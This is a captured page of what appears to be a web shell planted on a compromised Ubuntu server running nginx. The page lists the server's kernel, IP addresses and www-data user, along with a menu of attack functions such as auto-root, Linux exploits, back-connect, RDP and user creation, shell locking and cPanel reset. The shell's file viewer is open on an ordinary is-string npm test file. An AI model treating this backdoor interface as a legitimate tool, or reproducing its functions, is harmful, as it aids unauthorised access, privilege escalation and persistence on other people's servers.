Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
is-string /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.38
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict'; var test = require('tape'); var isString = require('../'); var hasToStringTag = require('has-tostringtag/shams')(); test('not Strings', function (t) { t.notOk(isString(), 'undefined is not String'); t.notOk(isString(null), 'null is not String'); t.notOk(isString(false), 'false is not String'); t.notOk(isString(true), 'true is not String'); t.notOk(isString([]), 'array is not String'); t.notOk(isString({}), 'object is not String'); t.notOk(isString(function () {}), 'function is not String'); t.notOk(isString(/a/g), 'regex literal is not String'); t.notOk(isString(new RegExp('a', 'g')), 'regex object is not String'); t.notOk(isString(new Date()), 'new Date() is not String'); t.notOk(isString(42), 'number is not String'); t.notOk(isString(Object(42)), 'number object is not String'); t.notOk(isString(NaN), 'NaN is not String'); t.notOk(isString(Infinity), 'Infinity is not String'); t.end(); }); test('@@toStringTag', { skip: !hasToStringTag }, function (t) { var fakeString = { toString: function () { return '7'; }, valueOf: function () { return '42'; } }; fakeString[Symbol.toStringTag] = 'String'; t.notOk(isString(fakeString), 'fake String with @@toStringTag "String" is not String'); t.end(); }); test('Strings', function (t) { t.ok(isString('foo'), 'string primitive is String'); t.ok(isString(Object('foo')), 'string object is String'); t.end(); });
Close